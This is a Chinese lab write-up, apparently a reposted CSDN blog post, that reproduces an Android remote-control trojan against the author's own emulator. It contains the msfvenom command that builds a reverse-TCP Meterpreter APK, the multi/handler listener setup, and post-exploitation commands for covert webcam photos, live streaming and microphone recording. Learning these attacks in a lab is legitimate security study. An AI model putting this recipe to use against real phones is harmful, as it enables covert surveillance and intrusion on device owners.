手机木马远程控制复现

news2024/12/27 13:42:41

目录

目录

前言

系列文章列表

渗透测试基础之永恒之蓝漏洞复现http://t.csdn.cn/EsMu2

思维导图

1,实验涉及复现环境   

2,Android模拟器环境配置

2.1,首先从官网上下载雷电模拟器

2.2,安装雷电模拟器 

2.3, 对模拟器网络进行配置

2.3.1,为什么要进行配置

2.3.2,进行配置 

2.3.3,安装成功后显示安装成功

3,生成后门

3.1,生成木马apk文件

3.2,将文件复制到windows系统上

3.3,将apk文件安装到模拟器中

3.4,木马文件安装成功

4,使用metasploit控制台对模拟器进行攻击

4.1 启动metasploit

4.2,使用攻击模块

4.3,设置攻击载荷

4.4,设置攻击机和端口号和攻击:

4.5,回到我们的模拟器靶机,我们点击运行我们安装的文件

 4.6 看到成功返回shell

5, 成功后我们能做什么?

5.1,查看模拟手机的版本信息

5.2,查看手机的网络信息

5.3,查看root状态

5.4,启用网页视屏聊天

5.5,查看手机有几个摄像头

5.6,进行录音操作

5.7,一些其他操作

5.7.1.网络和系统信息获取

5.7.2,系统命令执行和摄像头操作

6,总结


前言

本文章主要是进行一次测试吧,自己之前也没有进行过测试关于apk木马远控,最近事情也比较多,自己也就做一个简单的测试吧,后期会尝试使用自己的手机做一个真机测试.

系列文章列表


渗透测试基础之永恒之蓝漏洞复现icon-default.png?t=N7T8http://t.csdn.cn/EsMu2

思维导图

1,实验涉及复现环境   

  • Kali平台(Hack):192.168.10.xxx
  • Android模拟器(靶机1)
  • kali需要使用桥接模式,不然无法使用

                         如果出现桥接无法使用可以看这位大佬的配置教程 

                                kali无法连接网络(桥接、NAT无效)icon-default.png?t=N7T8http://t.csdn.cn/r9cug

2,Android模拟器环境配置

2.1,首先从官网上下载雷电模拟器

                                                   打开官网进行下载

雷电安卓模拟器-手游模拟器安卓版_android手机模拟器电脑版_雷电模拟器官网 (ldmnq.com)icon-default.png?t=N7T8https://www.ldmnq.com/

2.2,安装雷电模拟器 

                   下载完后。点击.exe文件直接运行安装,运行,下一步,直接完成安装。

                         安装后我们会在桌面看到这两个图标,然后我们点击雷神多开器

2.3, 对模拟器网络进行配置

2.3.1,为什么要进行配置

   安照我自己的理解就是,我们是在模拟器中模拟手机,所以就类似于我们使用虚拟机一样,所以我们需要将其与主机在同一网段下,这样我们才能对其进行攻击与控制.

2.3.2,进行配置 

对模拟器网络进行配置在右边的设置里面选择设置>网络设置>网络桥接模式开启,ip设置dhcp,最下面点击安装:

2.3.3,安装成功后显示安装成功

3,生成后门

3.1,生成木马apk文件

打开虚拟机,启动kali,打开终端,生成apk后门。lhost为kali的ip(可以根据自己的IP设定),lport指定一个端口5001(这里生成时指定的端口要与后续使用攻击端口一致,当然也不能使用特殊端口)。打开终端输入命令:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.223.138 lport=5001 >内心如初.apk

3.2,将文件复制到windows系统上

生成文件后,因为我是在桌面打开的终端文件会自动生成到桌面,然后将apk文件粘贴到我们的windows平台下,然后启动我们的雷电模拟器,点击启动:

3.3,将apk文件安装到模拟器中

                           这里我们可以将文件拖入或是选择文件放入也行

                                     在右下角有个apk,点击选择文件安装。

3.4,木马文件安装成功

                                出现下面的图标代表安装木马文件成功

4,使用metasploit控制台对模拟器进行攻击

这里关于前面的内容我就快速过来了,如果感兴趣的可以去看系列文章,有前面操作的详细介绍

4.1 启动metasploit

msfconsole 

4.2,使用攻击模块

use exploit/multi/handler

4.3,设置攻击载荷

                                           攻击载荷也就是攻击的脚本

set payload android/meterpreter/reverse_tcp

4.4,设置攻击机和端口号和攻击:

                 这里设置的ip地址是kali的,设置的端口要与制作木马时设置的一致

set lhost 192.168.xxx.xxx
set lport 5001
run

 

4.5,回到我们的模拟器靶机,我们点击运行我们安装的文件

 4.6 看到成功返回shell

                                     只要双击一次即可,这里是我多点了

5, 攻击成功后我们能做什么?

                                    这里在进行其他操作前需要先加载stdapi扩展

load stdapi

5.1,查看模拟手机的版本信息

sysinfo

5.2,查看手机的网络信息

ifconfig

5.3,查看root状态

check_root

                                                         手机无root权限

5.4,启用网页视屏聊天

webcam_chat

5.5,查看手机有几个摄像头

webcam_list

                                                        显示有两个摄像头 

5.6,进行录音操作

record_mic

5.7,一些其他操作

                                    进行调用摄像头偷拍,默认为前置摄像头

webcam_snap

网页摄像机视屏流,显示实时画面能够调用摄像头,实时观看被攻击者的像机对着的物体,以下为通过此办法可以获取到一段图片资料 

webcam_stream

                              获得shell后有很多的攻击方法,将其汇总如下

5.7.1.网络和系统信息获取

5.7.2,系统命令执行和摄像头操作

6,总结

本章是对使用木马对手机渗透远控的一次测试,在测试过程中我遇到了,在连接时IP无法使用,在我的思考下,我发现可能是主机的链接方式需要以桥接模式,这样才能保证,主机与和攻击目在同一网段下,但我链接后,发现无论如何也没发连上桥接网络的网络,并且是用ifconfig,并没有显示kali的主机ipv4地址,在我的不断搜索和尝试下,最终连上了网路获取到了新的IP地址,然后重新制作木马apk文件,再进行一次刚刚的流程,虽然解决问题的过程很累,但解决的那一刻,我是很欣喜的,快乐也就如此了吧,再学习自己喜欢的事情上,总是很有动力.

每日一言

如果可以的话,我也想成为这个世界中特殊的存在。

  如果我的学习笔记对你有用,不妨点赞收藏一下,感谢你的支持,当然也欢迎大佬给我一下建议或是对笔记中的不足进行补充,对我学习大有帮助,谢谢。  

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/995201.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

vagrant 虚拟机扩容磁盘

vagrant 虚拟机扩容磁盘 修改配置安装插件存储扩容 修改配置 参考博客:https://blog.csdn.net/marina_1/article/details/122238721 vagrant 版本 PS D:\vagrant\workplace\node2> vagrant --version Vagrant 2.3.7修改vagrant虚拟机配置文件Vagrantfile,添加磁…

互斥锁,自旋锁,读写锁

目录 互斥体 互斥锁 属性 使用流程(相关API函数) 互斥锁初始化和销毁的函数原型: 互斥锁的上锁和解锁的函数原型为: pthread_mutex_init() 定义 函数原型 返回值 初始化 pthread_mutex_destroy() 定义 函数原型 pt…

EasyAVFilter代码示例之将视频点播文件转码成HLS(m3u8+ts)视频点播格式

以下是一套完整的视频点播功能开发源码,就简简单单几行代码,就可以完成原来ffmpeg很复杂的视频点播转码调用流程,而且还可以集成在自己的应用程序中调用,例如java、php、cgo、c、nodejs,不需要再单独一个ffmpeg的进程来…

mongodb7.0安装全过程详解

mongodb安装全过程详解 安装mongodb环境安装mongodb shell 安装mongodb环境 进入mongodb官网下载社区版服务器 点击跳转下载地址 选择适应自己系统的版本,然后下载 下图为下载后的文件,双击进行安装 需要注意的两个点 ①选择完整安装 ②不下载mongo…

C语言深入理解指针(非常详细)(五)

目录 回调函数qsort使用举例qsort函数的模拟实现sizeof和strlen的对比sizeofstrlensizeof和strlen的对比一道关于sizeof的题 回调函数 回调函数就是一个通过函数指针调用的函数 如果你把函数的指针(地址)作为参数传递给另一个函数,当这个指…

状态管理Pinia

Vue3 状态管理 - Pinia 1. 什么是Pinia Pinia 是 Vue 的专属的最新状态管理库 ,是 Vuex 状态管理工具的替代品 2. 手动添加Pinia到Vue项目 后面在实际开发项目的时候,Pinia可以在项目创建时自动添加,现在我们初次学习,从零开始…

DockerFile打包项目实战解析,一文读懂dockerfile打包

文章目录 一、简介二、DockerFile基础1. DockerFile的作用和特点2. DockerFile语法介绍3. 基本指令:FROM、RUN、COPY、ADD等 三、编写具体项目使用DockerFile四、构建镜像1.项目构建默认命令dockerfile文件非默认命令dockerfile文件小知识 2. 使用ENTRYPOINT和CMD指…

C++11 新特性 ⑥ | 智能指针 unique_ptr、shared_ptr 和 weak_ptr

目录 1、引言 2、unique_ptr 3、shared_ptr 4、weak_ptr 5、shared_ptr循环引用问题(面试题) VC常用功能开发汇总(专栏文章列表,欢迎订阅,持续更新...)https://blog.csdn.net/chenlycly/article/detai…

Java之List集合的解析及泛型的概述

4.List集合的实现类 4.1List集合子类的特点【记忆】 ArrayList集合 底层是数组结构实现,查询快、增删慢 LinkedList集合 底层是链表结构实现,查询慢、增删快 4.2LinkedList集合的特有功能【应用】 特有方法 方法名说明public void addFirst(E e)在该…

小白备战大厂算法笔试(五)——树

文章目录 二叉树常用术语初始化插入与删除常见类型满二叉树完全二叉树完满二叉树平衡二叉树 二叉树退化二叉树遍历层序遍历前序、中序、后序遍历 数组表示二叉树表示完美二叉树表示任意二叉树 二叉搜索树查找节点插入节点删除节点遍历有序搜索效率常见应用 二叉树 二叉树是一种…

Dynamic CRM开发 - 实体窗体(一)

CRM创建一个实体以及实体字段后,在实体窗体里拖动字段和简单配置,就可以实现一个新增和编辑实体数据的表单,这种无代码的操作形式对非程序员非常的友好。 实体有四种类型的窗体:主窗体、快速视图窗体、快速创建窗体、卡窗体。 窗体区别如下: 窗体操作说明: 1、启用安全…

Windows定时任务实现开机自启动

Windows定时任务实现S11开机自启动 Windows键加 r 键打开运行窗口,然后输入control打开控制面板。

Linux内核分析与应用2-内存寻址

本系列是对 陈莉君 老师 Linux 内核分析与应用[1] 的学习与记录。讲的非常之好,推荐观看 留此记录,蜻蜓点水,可作抛砖引玉 2.1 内存寻址 数据连续存储和选择读取思想,是目前我们使用的几乎所有机器运行背后的灵魂 计算机体系结构中的核心问题之一,就是如…

python28种极坐标绘图函数总结

文章目录 基础图误差线等高线polar场图polar统计图非结构坐标图 📊python35种绘图函数总结,3D、统计、流场,实用性拉满 matplotlib中的画图函数,大部分情况下只要声明坐标映射是polar,就都可以画出对应的极坐标图。但…

深入浅出AXI协议(6)——传输属性

一、前言 在之前的文章中,我们介绍的主要内容是AXI协议的数据读写结构和读写响应结构,主要讲述了当遇到各种特殊情况时,AXI如何完成数据的读写操作,最后介绍了读写响应的4种类型。 在本文中,我们将介绍AXI协议的传输属性。 二、传…

centos7的yum修改为阿里源

yum修改为阿里源 1.安装wget yum install -y wget2.备份与下载源 cd /etc/yum.repos.d mv -f CentOS-Base.repo CentOS-Base.repo.backup wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7.repo mv epel.repo epel.repo.backup # 有些系…

C++引用与移动语义

目录 一.引用分类 1.名词解释 1).左右值 二.引用(左值引用) 1.左值引用(Lvalue Reference): 2.本质 3.形式 4.注意 5.示例 1)引用做左值 2)引用做函数返回值 三.右值引用 1.右值引…

代码随想录算法训练营day|139.单词拆分|多重背包基础力理论| 背包总结

139.单词拆分 力扣题目链接 给定一个非空字符串 s 和一个包含非空单词的列表 wordDict,判定 s 是否可以被空格拆分为一个或多个在字典中出现的单词。 说明: 拆分时可以重复使用字典中的单词。 你可以假设字典中没有重复的单词。 示例 1&#xff1a…

centos 端口被占用的快速排查方式

问题笔记 centos 端口被占用的快速排查方式 centos 端口被占用的快速排查方式 这里说一个我刚刚遇到的问题,解决步骤用来记录,方便以后自己查询。 nginx配置完index.html测试文件,发现一直显示的404页面。 我跑到服务器上想重启一下nginx …

如何从Git上拉取项目

1.Git的概念 Git是一个开源的分布式版本控制系统,可以有效、高速的处理从很小到非常大的项目版本管理。它实现多人协作的机制是利用clone命令将项目从远程库拉取到本地库,做完相应的操作后再利用push命令从本地库将项目提交至远程库。 2.Git的工作流程 …